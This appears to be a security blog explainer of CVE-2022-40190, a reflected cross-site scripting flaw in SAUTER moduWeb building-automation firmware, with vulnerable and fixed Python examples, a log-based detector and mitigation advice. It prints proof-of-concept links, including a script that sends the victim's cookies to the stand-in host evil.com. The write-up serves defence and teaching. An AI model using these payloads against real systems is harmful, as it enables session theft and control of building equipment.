If you’re dealing with building automation, SAUTER’s Controls moduWeb devices are hard to miss. These web interfaces manage all kinds of smart-building equipment, letting admins keep an eye on environmental controls right from a browser. But with CVE-2022-40190, that convenience comes at a price: a reflected cross-site scripting (XSS) bug in firmware version 2.7.1 puts admin sessions (and the data and controls behind them) at risk.
In this article, we’ll explain what CVE-2022-40190 is, walk through *exactly* how the vulnerability works, show you a simple exploit, and give links to everything you need to know.
What is CVE-2022-40190?
CVE-2022-40190 is a security flaw in SAUTER Controls moduWeb firmware version 2.7.1. Put simply, the web application does not sanitize or encode what users send to it before echoing it back. If an attacker places JavaScript in a request parameter, the server returns that code straight back inside the HTML response, and the victim’s browser executes it.
This is called *reflected* or *non-persistent* XSS. It’s dangerous because an attacker can craft a link, send it to a victim, and, when the victim clicks, the browser runs the attacker’s code in the context of the moduWeb origin. This could lead to:
- Abuse of the victim’s permissions in the application
Original reference:
- NIST NVD entry for CVE-2022-40190
- ICS Advisory (ICSA-22-246-03) by CISA
How Does the Exploit Work?
The problem: the moduWeb server receives a *request string* (such as a URL parameter), inserts it straight into an HTML page, and returns it to the user. If that string contains JavaScript, the victim’s browser executes it.
Let’s say there’s a page like this (the path and parameter name are illustrative, not taken from the advisory):
http://moduweb.local/index.html?msg=welcome
If the web app places msg into the page without encoding it, you can swap welcome for any HTML or JavaScript you want.
Example Exploit Link
http://moduweb.local/index.html?msg=<script>alert('XSS')</script>
What happens?
When a user opens this link, the page displays an alert pop-up reading XSS. The pop-up itself is harmless; it is simply proof that attacker-controlled script ran in their browser under the moduWeb origin.
Here’s a simplified Python illustration of what the vulnerable server might be doing (the real firmware is not written in Python; this only shows the bug class):
```python
# Simplified illustration of the vulnerable rendering path
def render_page(request):
    msg = request.GET['msg']          # attacker-controlled query parameter
    page = f"""
<html>
<body>
<p>{msg}</p> <!-- Vulnerable: msg is interpolated without HTML encoding -->
</body>
</html>
"""
    return page
```
There’s no filtering or encoding here. If msg contains a script, it will run in the user’s browser.
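To make the contrast concrete, here is an added example (not code from this page or from SAUTER) that puts the vulnerable rendering side by side with a fixed version that HTML-encodes the parameter on output, plus the check a pentester would run against a response. The endpoint, the parameter name msg, and the payload are the hypothetical ones used above, not values from the advisory.

```python
import html
from urllib.parse import parse_qs, urlencode

# Hypothetical endpoint and parameter name, mirroring the example above;
# neither is taken from the SAUTER advisory.
BASE_URL = "http://moduweb.local/index.html"
PARAM = "msg"

# Constructed test payload: the same harmless proof-of-concept used above.
PAYLOAD = "<script>alert('XSS')</script>"


def _get_msg(query_string: str) -> str:
    """Pull the msg parameter out of a raw query string, defaulting to 'welcome'."""
    params = parse_qs(query_string, keep_blank_values=True)
    return params.get(PARAM, ["welcome"])[0]


def handle_vulnerable(query_string: str) -> str:
    """Reflects the parameter into HTML with no output encoding (the bug class)."""
    msg = _get_msg(query_string)
    return f"<html><body><p>{msg}</p></body></html>"


def handle_fixed(query_string: str) -> str:
    """Same page, but HTML-encodes the parameter for the element-content context.

    html.escape turns < > & " ' into entities, so a <script> tag arrives in the
    browser as inert text. This encoder is right for HTML text and quoted
    attribute values only; a value dropped into a <script> block, a URL or CSS
    needs a context-specific encoder instead.
    """
    msg = _get_msg(query_string)
    return f"<html><body><p>{html.escape(msg, quote=True)}</p></body></html>"


def build_attack_url(payload: str) -> str:
    """Build the link an attacker would send; browsers send it percent-encoded."""
    return f"{BASE_URL}?{urlencode({PARAM: payload})}"


def reflected_unencoded(body: str, payload: str) -> bool:
    """Pentester's check: does the payload appear byte-for-byte in the response?

    If it does, the parameter is reflected without encoding. If only an
    entity-encoded form appears, the page is reflecting but not (in this
    context) exploitable.
    """
    return payload in body


if __name__ == "__main__":
    qs = urlencode({PARAM: PAYLOAD})  # what the browser actually puts on the wire
    print(build_attack_url(PAYLOAD))
    print("vulnerable reflects raw payload:", reflected_unencoded(handle_vulnerable(qs), PAYLOAD))
    print("fixed reflects raw payload:     ", reflected_unencoded(handle_fixed(qs), PAYLOAD))
```

The fix is output encoding at the point of interpolation, not input filtering: a blocklist on the way in is easy to bypass with alternative tags and event handlers, while encoding for the exact context the value lands in closes the whole class.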
Real World Impact
If you control a building or critical system with SAUTER’s moduWeb, and an attacker sends you a crafted link (perhaps in an email), clicking it could:
- Change settings or cause harm using *your* permissions
And since the web management console sometimes controls physical systems, there’s more at stake than on a typical website!
A common attack would be to steal a session cookie using a payload like:
```html
<script>
fetch('http://evil.com/steal?cookie=' + document.cookie)
</script>
```
An attacker could send this in a link (the browser percent-encodes the special characters on the wire; the server decodes them back before reflecting):
http://moduweb.local/index.html?msg=<script>fetch('http://evil.com/steal?cookie='+document.cookie)</script>
Now, when the targeted admin visits the link, their browser quietly sends their cookies (which may include the session ID) to evil.com, and the attacker can replay them to act as that admin. One caveat worth knowing: if the session cookie carries the HttpOnly flag, document.cookie will not expose it, but the injected script can still issue authenticated requests to moduWeb from inside the victim’s browser, so the admin’s session is abused either way.
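For the defender’s side, here is an added example (not from this page or the vendor) of the detection logic you would run over web-server access logs to spot reflected-XSS attempts against the moduWeb interface. The log lines are constructed for this example and assume Apache combined log format from a reverse proxy in front of the device; moduWeb’s own logging is not documented here, so adapt the line regex to what you actually collect. The endpoint and parameter are the hypothetical ones used above.

```python
import re
from urllib.parse import unquote

# Constructed sample lines (combined log format). Lines 2, 3 and 5 carry
# reflected-XSS attempts; line 5 is double-percent-encoded, a common evasion.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Nov/2022:10:00:01 +0000] "GET /index.html?msg=welcome HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Nov/2022:10:01:44 +0000] "GET /index.html?msg=%3Cscript%3Ealert(%27XSS%27)%3C%2Fscript%3E HTTP/1.1" 200 560 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Nov/2022:10:02:02 +0000] "GET /index.html?msg=%3Cscript%3Efetch(%27http://evil.com/steal?cookie=%27%2Bdocument.cookie)%3C/script%3E HTTP/1.1" 200 640 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Nov/2022:10:03:10 +0000] "GET /index.html?msg=%3Cb%3Ehi%3C/b%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.11 - - [01/Nov/2022:10:04:33 +0000] "GET /index.html?msg=%253Cscript%253Ealert(1)%253C%252Fscript%253E HTTP/1.1" 200 530 "-" "Mozilla/5.0"
"""

# One combined-log-format line: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Script-execution primitives only, to keep noise down on a BAS console.
# Widen this if any HTML tag in a query parameter is abnormal for your site.
XSS_MARKERS = re.compile(
    r"<\s*script"
    r"|javascript\s*:"
    r"|<\s*(?:img|svg|iframe|object|embed)\b"
    r"|\bon(?:error|load|click|mouseover|focus|blur|toggle|animationstart)\s*=",
    re.IGNORECASE,
)


def decode_fully(s: str, max_rounds: int = 3) -> str:
    """Percent-decode repeatedly (bounded) so double-encoded payloads are caught."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def scan_log(text: str) -> list:
    """Return one finding per request whose decoded query string carries an XSS marker."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        path, _, query = m.group("target").partition("?")
        if not query:
            continue
        decoded = decode_fully(query)
        hit = XSS_MARKERS.search(decoded)
        if hit:
            findings.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "path": path,
                "status": int(m.group("status")),
                "marker": hit.group(0),
                "query": decoded,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['path']} status={f['status']} marker={f['marker']!r}")
```

One point this reveals that is specific to reflected XSS: the client IP on a flagged line is the victim’s browser (the admin who clicked the link), not the attacker’s. The hit tells you who was phished and from which workstation; finding the sender means going back to the email or chat that delivered the link. A 200 on a flagged request is consistent with the unpatched firmware reflecting the payload, but only a response-body check (as in the pentester’s probe above) confirms it.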
Official References & More Reading
- SAUTER Product Security Advisory Page
- CISA ICS Advisory ICSA-22-246-03
- NVD: CVE-2022-40190
Wrapping Up
CVE-2022-40190 shows how even specialized devices like building automation controllers can be left wide open to web-based attacks. A simple oversight, reflecting user input into a page without encoding it for that context, can hand an attacker an admin’s session.
If you’re a site admin or integrator using SAUTER moduWeb, check the vendor advisory for fixed firmware and lock down web access in the meantime: keep the management interface off the internet and on a segmented network, and treat unexpected links to it with suspicion. If you’re a pentester or security enthusiast, this is yet another example of how small bugs create outsized risk in cyber-physical systems.
Timeline
Published on: 10/31/2022 21:15:00 UTC
Last modified on: 11/02/2022 14:13:00 UTC